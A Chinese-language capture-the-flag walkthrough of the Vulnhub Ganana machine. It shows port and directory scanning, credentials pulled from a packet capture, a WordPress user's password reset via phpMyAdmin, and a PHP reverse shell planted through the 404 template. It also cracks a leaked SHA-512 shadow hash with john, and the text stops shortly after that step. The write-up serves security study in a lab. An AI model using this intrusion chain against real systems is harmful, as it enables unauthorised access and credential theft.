Vulnhub Ganana靶机解题过程
Ganana
识别目标主机IP地址
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:86:52:7b 1 60 PCS Systemtechnik GmbH
192.168.56.163 08:00:27:03:83:d3 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.163
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.163 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 03:28 EST
Nmap scan report for 192.168.56.163
Host is up (0.00034s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd (PHP 7.3.17)
|_http-server-header: Apache
|_http-generator: WordPress 5.4.2
|_http-title: Ganana
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
443/tcp open ssl/http Apache httpd (PHP 7.3.17)
| ssl-cert: Subject: commonName=www.example.com/organizationName=Bitnami
| Not valid before: 2020-06-06T10:55:45
|_Not valid after: 2030-06-04T10:55:45
|_http-server-header: Apache
|_ssl-date: TLS randomness does not represent time
| http-robots.txt: 1 disallowed entry
|_/wp-admin/
|_http-title: Ganana
|_http-generator: WordPress 5.4.2
6777/tcp open ftp vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_Can't get directory listing: TIMEOUT
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.168.56.137
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 4
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
MAC Address: 08:00:27:03:83:D3 (Oracle VirtualBox virtual NIC)
Service Info: OS: Unix
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 161.93 seconds
Get Access
先从FTP服务开始信息的采集和分析
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ ftp 192.168.56.163 -P 6777
Connected to 192.168.56.163.
220 (vsFTPd 3.0.3)
Name (192.168.56.163:kali): ftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||25711|)
└─$ curl http://192.168.56.163/robots.txt
User-agent: *
Disallow: /wp-admin/
Allow: /wp-admin/admin-ajax.php
443端口和80端口返回的内容是一致的。
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ gobuster dir -u http://192.168.56.163 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.163
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/08 03:49:34 Starting gobuster in directory enumeration mode
===============================================================
/rss (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/]
/register (Status: 302) [Size: 0] [--> http://192.168.56.163/secret/?registration=disabled]
/0 (Status: 301) [Size: 0] [--> http://192.168.56.163/0/]
/feed (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/]
/atom (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/atom/]
/wp-content (Status: 301) [Size: 241] [--> http://192.168.56.163/wp-content/]
/rss2 (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/]
/license (Status: 200) [Size: 19915]
/wp-includes (Status: 301) [Size: 242] [--> http://192.168.56.163/wp-includes/]
/logout (Status: 403) [Size: 2795]
/rdf (Status: 301) [Size: 0] [--> http://192.168.56.163/feed/rdf/]
/page1 (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/readme (Status: 200) [Size: 7274]
/' (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/lostpassword (Status: 200) [Size: 10861]
/dashboard (Status: 302) [Size: 0] [--> http://192.168.56.163/secret/?redirect_to=%2Fdashboard]
/%20 (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/secret (Status: 302) [Size: 0] [--> http://192.168.56.163/secret/]
/wp-admin (Status: 301) [Size: 239] [--> http://192.168.56.163/wp-admin/]
/phpmyadmin (Status: 301) [Size: 241] [--> http://192.168.56.163/phpmyadmin/]
/0000 (Status: 301) [Size: 0] [--> http://192.168.56.163/0000/]
/tasks (Status: 200) [Size: 156]
/embed (Status: 301) [Size: 0] [--> http://192.168.56.163/embed/]
/xmlrpc (Status: 405) [Size: 42]
/resetpass (Status: 302) [Size: 0] [--> http://192.168.56.163/lostpassword/?error=invalidkey]
/Oasis - 'Definitely Maybe' (Status: 301) [Size: 0] [--> http://192.168.56.163/Oasis%20-%20%27Definitely%20Maybe]
/wp-signup (Status: 500) [Size: 2686]
/! (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/yahoo! (Status: 301) [Size: 0] [--> http://192.168.56.163/yahoo]
/Check Screenshots! (Status: 301) [Size: 0] [--> http://192.168.56.163/Check%20Screenshots]
/Check All Tracker Features! (Status: 301) [Size: 0] [--> http://192.168.56.163/Check%20All%20Tracker%20Features]
/Bling! (Status: 301) [Size: 0] [--> http://192.168.56.163/Bling]
/Welcome! (Status: 301) [Size: 0] [--> http://192.168.56.163/Welcome]
/b00g! (Status: 301) [Size: 0] [--> http://192.168.56.163/b00g]
/party! (Status: 301) [Size: 0] [--> http://192.168.56.163/party]
/leeches! (Status: 301) [Size: 0] [--> http://192.168.56.163/leeches]
/Mac Fishin!!! (Status: 301) [Size: 0] [--> http://192.168.56.163/Mac%20Fishin]
/i deep throat in a thong! (Status: 301) [Size: 0] [--> http://192.168.56.163/i%20deep%20throat%20in%20a%20thong]
/new! (Status: 301) [Size: 0] [--> http://192.168.56.163/new]
/KeithRankin%20 (Status: 301) [Size: 0] [--> http://192.168.56.163/KeithRankin]
/Naked Gymnastics - This Is How It Should Always Be! (Status: 301) [Size: 0] [--> http://192.168.56.163/Naked%20Gymnastics%20-%20This%20Is%20How%20It%20Should%20Always%20Be]
/nada! (Status: 301) [Size: 0] [--> http://192.168.56.163/nada]
/Q Are We Not Men A We Are Devo! (Status: 301) [Size: 0] [--> http://192.168.56.163/Q%20Are%20We%20Not%20Men%20A%20We%20Are%20Devo]
/!index! (Status: 301) [Size: 0] [--> http://192.168.56.163/!index]
/35-GeoCool! (Status: 301) [Size: 0] [--> http://192.168.56.163/35-GeoCool]
/kaspersky%20 (Status: 301) [Size: 0] [--> http://192.168.56.163/kaspersky]
/Ping%21 (Status: 301) [Size: 0] [--> http://192.168.56.163/Ping]
/Ajax_%28programming%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/Ajax_%28programming]
/page01 (Status: 301) [Size: 0] [--> http://192.168.56.163/]
/Clinton%20Sparks%20%26%20Diddy%20-%20Dont%20Call%20It%20A%20Comeback%28RuZtY%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/Clinton%20Sparks%20%26%20Diddy%20-%20Dont%20Call%20It%20A%20Comeback%28RuZtY]
/Yahoo%21 (Status: 301) [Size: 0] [--> http://192.168.56.163/Yahoo]
/Go! (Status: 301) [Size: 0] [--> http://192.168.56.163/Go]
/Sevendust%20-%20Animosity%20%282001%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/Sevendust%20-%20Animosity%20%282001]
/David%20Wright%20-%20Deeper%20%28New%20Age%2C%202005%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/David%20Wright%20-%20Deeper%20%28New%20Age%2C%202005]
/Cirque%20du%20soleil%20 (Status: 301) [Size: 0] [--> http://192.168.56.163/Cirque%20du%20soleil]
/Rameses%20II%20-%20Wrath%20of%20God%20or%20Man%20%28Discovery%20Channel%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/Rameses%20II%20-%20Wrath%20of%20God%20or%20Man%20%28Discovery%20Channel]
/Windows%20Longhorn%20Server%20Core%20Lite%20%28December%202006%29 (Status: 301) [Size: 0] [--> http://192.168.56.163/Windows%20Longhorn%20Server%20Core%20Lite%20%28December%202006]
/%22james%20kim%22 (Status: 301) [Size: 0] [--> http://192.168.56.163/%22james%20kim]
/%22julie%20roehm%22 (Status: 301) [Size: 0] [--> http://192.168.56.163/%22julie%20roehm]
/%22britney%20spears%22 (Status: 301) [Size: 0] [--> http://192.168.56.163/%22britney%20spears]
Progress: 220538 / 220561 (99.99%)===============================================================
2022/11/08 04:29:59 Finished
=============================================================
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ wpscan --url http://192.168.56.163 -e u,p
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.22
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]n
[+] URL: http://192.168.56.163/ [192.168.56.163]
[+] Started: Tue Nov 8 04:37:59 2022
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Powered-By: PHP/7.3.17
| - X-Mod-Pagespeed: 1.13.35.2-0
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.56.163/robots.txt
| Interesting Entries:
| - /wp-admin/
| - /wp-admin/admin-ajax.php
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.56.163/xmlrpc.php
| Found By: Link Tag (Passive Detection)
| Confidence: 100%
| Confirmed By: Direct Access (Aggressive Detection), 100% confidence
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://192.168.56.163/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.56.163/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.56.163/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://192.168.56.163/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: tsumugi
| Location: http://192.168.56.163/wp-content/themes/tsumugi/
| Latest Version: 2.2.1 (up to date)
| Last Updated: 2019-05-05T00:00:00.000Z
| Readme: http://192.168.56.163/wp-content/themes/tsumugi/readme.txt
| Style URL: http://192.168.56.163/wp-content/themes/tsumugi/style.css?ver=2.2.1
| Style Name: tsumugi
| Style URI: http://littlebirdjp.github.io/tsumugi/
| Description: tsumugi is a simple blog theme based on _s and Bootstrap. It consists of a single column layout whic...
| Author: youthkee
| Author URI: http://littlebird.mobi/
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 2.2.1 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.56.163/wp-content/themes/tsumugi/style.css?ver=2.2.1, Match: 'Version: 2.2.1'
[+] Enumerating Most Popular Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
[i] Plugin(s) Identified:
[+] stop-user-enumeration
| Location: http://192.168.56.163/wp-content/plugins/stop-user-enumeration/
| Last Updated: 2022-08-12T18:59:00.000Z
| [!] The version is out of date, the latest version is 1.4.5
|
| Found By: Urls In 404 Page (Passive Detection)
|
| Version: 1.3.25 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://192.168.56.163/wp-content/plugins/stop-user-enumeration/frontend/js/frontend.js?ver=1.3.25
| Confirmed By:
| Readme - Stable Tag (Aggressive Detection)
| - http://192.168.56.163/wp-content/plugins/stop-user-enumeration/readme.txt
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.163/wp-content/plugins/stop-user-enumeration/readme.txt
[+] theme-my-login
| Location: http://192.168.56.163/wp-content/plugins/theme-my-login/
| Last Updated: 2022-06-10T20:31:00.000Z
| [!] The version is out of date, the latest version is 7.1.5
|
| Found By: Urls In 404 Page (Passive Detection)
|
| Version: 7.1 (100% confidence)
| Found By: Query Parameter (Passive Detection)
| - http://192.168.56.163/wp-content/plugins/theme-my-login/assets/styles/theme-my-login.min.css?ver=7.1
| Confirmed By:
| Readme - ChangeLog Section (Aggressive Detection)
| - http://192.168.56.163/wp-content/plugins/theme-my-login/readme.txt
| Translation File (Aggressive Detection)
| - http://192.168.56.163/wp-content/plugins/theme-my-login/languages/theme-my-login.pot, Match: '"Project-Id-Version: Theme My Login 7.1'
[+] Enumerating Users (via Passive and Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:00 <==============================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:00
[i] No Users Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Tue Nov 8 04:38:02 2022
[+] Requests Done: 53
[+] Cached Requests: 9
[+] Data Sent: 13.562 KB
[+] Data Received: 156.932 KB
[+] Memory used: 234.977 MB
[+] Elapsed time: 00:00:03
利用Gobuster扫出来一个/lostpassword的目录,但是需要首先知道用户名。
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ dirb http://192.168.56.163
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Nov 8 04:41:20 2022
URL_BASE: http://192.168.56.163/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.56.163/ ----
==> DIRECTORY: http://192.168.56.163/0/
+ http://192.168.56.163/atom (CODE:301|SIZE:0)
+ http://192.168.56.163/dashboard (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.163/embed/
+ http://192.168.56.163/favicon.ico (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.163/feed/
+ http://192.168.56.163/index.php (CODE:301|SIZE:0)
+ http://192.168.56.163/license (CODE:200|SIZE:19915)
+ http://192.168.56.163/logout (CODE:403|SIZE:2795)
+ http://192.168.56.163/lostpassword (CODE:200|SIZE:10889)
+ http://192.168.56.163/page1 (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.56.163/phpmyadmin/
+ http://192.168.56.163/rdf (CODE:301|SIZE:0)
+ http://192.168.56.163/readme (CODE:200|SIZE:7274)
+ http://192.168.56.163/register (CODE:302|SIZE:0)
+ http://192.168.56.163/robots.txt (CODE:200|SIZE:67)
+ http://192.168.56.163/rss (CODE:301|SIZE:0)
+ http://192.168.56.163/rss2 (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.56.163/secret/
+ http://192.168.56.163/tasks (CODE:200|SIZE:156)
==> DIRECTORY: http://192.168.56.163/wp-admin/
+ http://192.168.56.163/wp-config (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-content/
+ http://192.168.56.163/wp-cron (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-includes/
+ http://192.168.56.163/wp-links-opml (CODE:200|SIZE:221)
+ http://192.168.56.163/wp-load (CODE:200|SIZE:0)
+ http://192.168.56.163/wp-mail (CODE:403|SIZE:2709)
+ http://192.168.56.163/wp-settings (CODE:500|SIZE:0)
+ http://192.168.56.163/xmlrpc (CODE:405|SIZE:42)
+ http://192.168.56.163/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: http://192.168.56.163/0/ ----
+ http://192.168.56.163/0/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.56.163/0/feed/
+ http://192.168.56.163/0/index.php (CODE:301|SIZE:0)
+ http://192.168.56.163/0/rdf (CODE:301|SIZE:0)
+ http://192.168.56.163/0/rss (CODE:301|SIZE:0)
+ http://192.168.56.163/0/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://192.168.56.163/embed/ ----
+ http://192.168.56.163/embed/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.56.163/embed/feed/
+ http://192.168.56.163/embed/index.php (CODE:301|SIZE:0)
+ http://192.168.56.163/embed/rdf (CODE:301|SIZE:0)
+ http://192.168.56.163/embed/rss (CODE:301|SIZE:0)
+ http://192.168.56.163/embed/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://192.168.56.163/feed/ ----
==> DIRECTORY: http://192.168.56.163/feed/atom/
+ http://192.168.56.163/feed/feed (CODE:301|SIZE:0)
+ http://192.168.56.163/feed/index.php (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.56.163/feed/rdf/
+ http://192.168.56.163/feed/rss (CODE:301|SIZE:0)
+ http://192.168.56.163/feed/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://192.168.56.163/phpmyadmin/ ----
+ http://192.168.56.163/phpmyadmin/ChangeLog (CODE:200|SIZE:27390)
==> DIRECTORY: http://192.168.56.163/phpmyadmin/doc/
==> DIRECTORY: http://192.168.56.163/phpmyadmin/examples/
+ http://192.168.56.163/phpmyadmin/favicon.ico (CODE:200|SIZE:22486)
+ http://192.168.56.163/phpmyadmin/index.php (CODE:200|SIZE:15104)
==> DIRECTORY: http://192.168.56.163/phpmyadmin/js/
==> DIRECTORY: http://192.168.56.163/phpmyadmin/libraries/
+ http://192.168.56.163/phpmyadmin/LICENSE (CODE:200|SIZE:18092)
==> DIRECTORY: http://192.168.56.163/phpmyadmin/locale/
+ http://192.168.56.163/phpmyadmin/phpinfo.php (CODE:200|SIZE:15106)
+ http://192.168.56.163/phpmyadmin/README (CODE:200|SIZE:1520)
+ http://192.168.56.163/phpmyadmin/robots.txt (CODE:200|SIZE:26)
==> DIRECTORY: http://192.168.56.163/phpmyadmin/setup/
==> DIRECTORY: http://192.168.56.163/phpmyadmin/sql/
==> DIRECTORY: http://192.168.56.163/phpmyadmin/templates/
==> DIRECTORY: http://192.168.56.163/phpmyadmin/themes/
==> DIRECTORY: http://192.168.56.163/phpmyadmin/tmp/
==> DIRECTORY: http://192.168.56.163/phpmyadmin/vendor/
---- Entering directory: http://192.168.56.163/secret/ ----
+ http://192.168.56.163/secret/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.56.163/secret/feed/
+ http://192.168.56.163/secret/index.php (CODE:301|SIZE:0)
+ http://192.168.56.163/secret/rdf (CODE:301|SIZE:0)
+ http://192.168.56.163/secret/rss (CODE:301|SIZE:0)
+ http://192.168.56.163/secret/rss2 (CODE:301|SIZE:0)
---- Entering directory: http://192.168.56.163/wp-admin/ ----
+ http://192.168.56.163/wp-admin/about (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/admin (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/admin.php (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/atom (CODE:301|SIZE:0)
+ http://192.168.56.163/wp-admin/comment (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/credits (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-admin/css/
+ http://192.168.56.163/wp-admin/customize (CODE:403|SIZE:2680)
+ http://192.168.56.163/wp-admin/edit (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/export (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-admin/feed/
==> DIRECTORY: http://192.168.56.163/wp-admin/images/
+ http://192.168.56.163/wp-admin/import (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-admin/includes/
+ http://192.168.56.163/wp-admin/index (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-admin/js/
+ http://192.168.56.163/wp-admin/link (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-admin/maint/
+ http://192.168.56.163/wp-admin/media (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/menu (CODE:500|SIZE:0)
+ http://192.168.56.163/wp-admin/moderation (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-admin/network/
+ http://192.168.56.163/wp-admin/options (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/plugins (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/post (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/privacy (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/profile (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/rdf (CODE:301|SIZE:0)
+ http://192.168.56.163/wp-admin/rss (CODE:301|SIZE:0)
+ http://192.168.56.163/wp-admin/rss2 (CODE:301|SIZE:0)
+ http://192.168.56.163/wp-admin/term (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/themes (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/tools (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/update (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/upgrade (CODE:200|SIZE:1456)
+ http://192.168.56.163/wp-admin/upload (CODE:302|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-admin/user/
+ http://192.168.56.163/wp-admin/users (CODE:302|SIZE:0)
+ http://192.168.56.163/wp-admin/widgets (CODE:302|SIZE:0)
---- Entering directory: http://192.168.56.163/wp-content/ ----
+ http://192.168.56.163/wp-content/atom (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-content/feed/
+ http://192.168.56.163/wp-content/index (CODE:200|SIZE:0)
+ http://192.168.56.163/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-content/languages/
==> DIRECTORY: http://192.168.56.163/wp-content/plugins/
+ http://192.168.56.163/wp-content/rdf (CODE:301|SIZE:0)
+ http://192.168.56.163/wp-content/rss (CODE:301|SIZE:0)
+ http://192.168.56.163/wp-content/rss2 (CODE:301|SIZE:0)
==> DIRECTORY: http://192.168.56.163/wp-content/themes/
==> DIRECTORY: http://192.168.56.163/wp-content/upgrade/
==> DIRECTORY: http://192.168.56.163/wp-content/uploads/
v
利用dirb扫描出另一个目录/task
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ curl http://192.168.56.163/tasks
Hey Jarret Lee!
Do manage the office as the admin is away for a few weeks!
Admin has created an other temp account for you and details in a pcapng file.
从这里看出用户名为jarretlee
提交该用户名,提示是正确的用户名。
/tasks返回说有一个pcapng文件,猜测jarret.pcapng,下载到Kali Linux本地,用Wireshark打开:
log=jarretlee&pwd=jarretLEE&redirect_to=http%3A%2F%2F192.168.3.109%2Fwp-admin%2F&testcookie=1HTTP/1.1 200 OK
Date: Sun, 07 Jun 2020 08:45:15 GMT
Server: Apache
X-Powered-By: PHP/7.3.17
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/json; charset=UTF-8
{"success":false,"data":{"errors":"<ul class="tml-errors"><li class="tml-error">Error</strong>: The password you entered for the username jarretlee</strong> is incorrect. <a href="http://192.168.3.109/lostpassword/">Lost your password?</a></li></ul>"}}
不过这个密码是错误的,因为success状态是False,继续寻找
log=jarretlee&pwd=NoBrUtEfOrCe__R3Qu1R3d__&redirect_to=http%3A%2F%2F192.168.3.109%2Fwp-admin%2F&testcookie=1HTTP/1.1 200 OK
成功找到了用户名和密码: jarretlee 密码:NoBrUtEfOrCe__R3Qu1R3d__
登录wordpress后台:
成功登录后,有一个post的 draft, 内容是QGx3YXlzLUAtU3VwM3ItU2VjdXIzLXBAU1N3MFJkISE
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ echo "QGx3YXlzLUAtU3VwM3ItU2VjdXIzLXBAU1N3MFJkISE" | base64 -d
@lways-@-Sup3r-Secur3-p@SSw0Rd!!base64: invalid input
用这个密码登录phpmyadmin,用户名还是jarretlee
修改wordpress用户charleywalker的密码,可以改成jarretlee一样的密码
现在用charleywalker以及修改后的密码登录wordpress后台
charleywalker的功能要比Jarretlee多,现在要设法将php反向shell脚本上传至wordpress
方法是修改404模板,将shell.php代码拷贝更新404模板
然后在浏览器任意访问一个不存在的问题如http://192.168.56.163/xxxxx.php
在Kali Linux上成功获得shell
并切换到jarretlee用户,密码与wordpress相同
jarretlee@debian:~$ sudo -l
sudo -l
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
[sudo] password for jarretlee: NoBrUtEfOrCe__R3Qu1R3d__
Sorry, user jarretlee may not run sudo on localhost.
jarretlee@debian:~$ id
id
uid=1000(jarretlee) gid=1000(jarretlee) groups=1000(jarretlee)
jarretlee@debian:~$ ls
ls
jarretlee@debian:~$ ls -alh
ls -alh
total 32K
drwxr-xr-x 3 jarretlee jarretlee 4.0K Jun 25 2020 .
drwxr-xr-x 3 600 root 4.0K Jun 17 2020 ..
-rw------- 1 jarretlee jarretlee 177 Jun 17 2020 .backups
-rw------- 1 jarretlee jarretlee 515 Jun 25 2020 .bash_history
-rw-r--r-- 1 jarretlee jarretlee 220 Jun 17 2020 .bash_logout
-rw-r--r-- 1 jarretlee jarretlee 3.5K Jun 17 2020 .bashrc
drwx------ 3 jarretlee jarretlee 4.0K Jun 25 2020 .gnupg
-rw-r--r-- 1 jarretlee jarretlee 807 Jun 17 2020 .profile
jarretlee@debian:~$ cat .backups
cat .backups
amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6
jarretlee@debian:~$
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ echo "amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6" | base64 -d
jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::
显然这是jeevan的加密后的密码,用john工具破解。
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ echo "amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6" | base64 -d
jeevan:$6$LXNakaBRJ/tL5F2a$bCgiylk/LY2MeFp5z9YZyiezsNsgj.5/cDohRgFRBNdrwi/2IPkUO0rqVIM3O8vysc48g3Zpo/sHuo.qwBf4U1:18430:0:99999:7:::
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ echo "amVldmFuOiQ2JExYTmFrYUJSSi90TDVGMmEkYkNnaXlsay9MWTJNZUZwNXo5WVp5aWV6c05zZ2ouNS9jRG9oUmdGUkJOZHJ3aS8ySVBrVU8wcnFWSU0zTzh2eXNjNDhnM1pwby9zSHVvLnF3QmY0VTE6MTg0MzA6MDo5OTk5OTo3Ojo6" | base64 -d > jeevan_hashes
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ ls
jarret.pcapng jeevan_hashes mJENuxqo.atom nmap_full_scan shell.php
┌──(kali㉿kali)-[~/Vulnhub/Ganana]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt jeevan_hashes
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
hannahmontana (jeevan)
1g 0:00:00:00 DONE (2022-11-08 05:40) 1.515g/s 3878p/s 3878c/s 3878C/s skyblue..hassan
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
破解了jeevan的密码,切换到jeevan用户,发现Jeevan是属于docker用户组
jeevan@debian:/home/jarretlee$ sudo -l
sudo -l
[sudo] password for jeevan: hannahmontana
Sorry, user jeevan may not run sudo on localhost.
jeevan@debian:/home/jarretlee$ cd /home
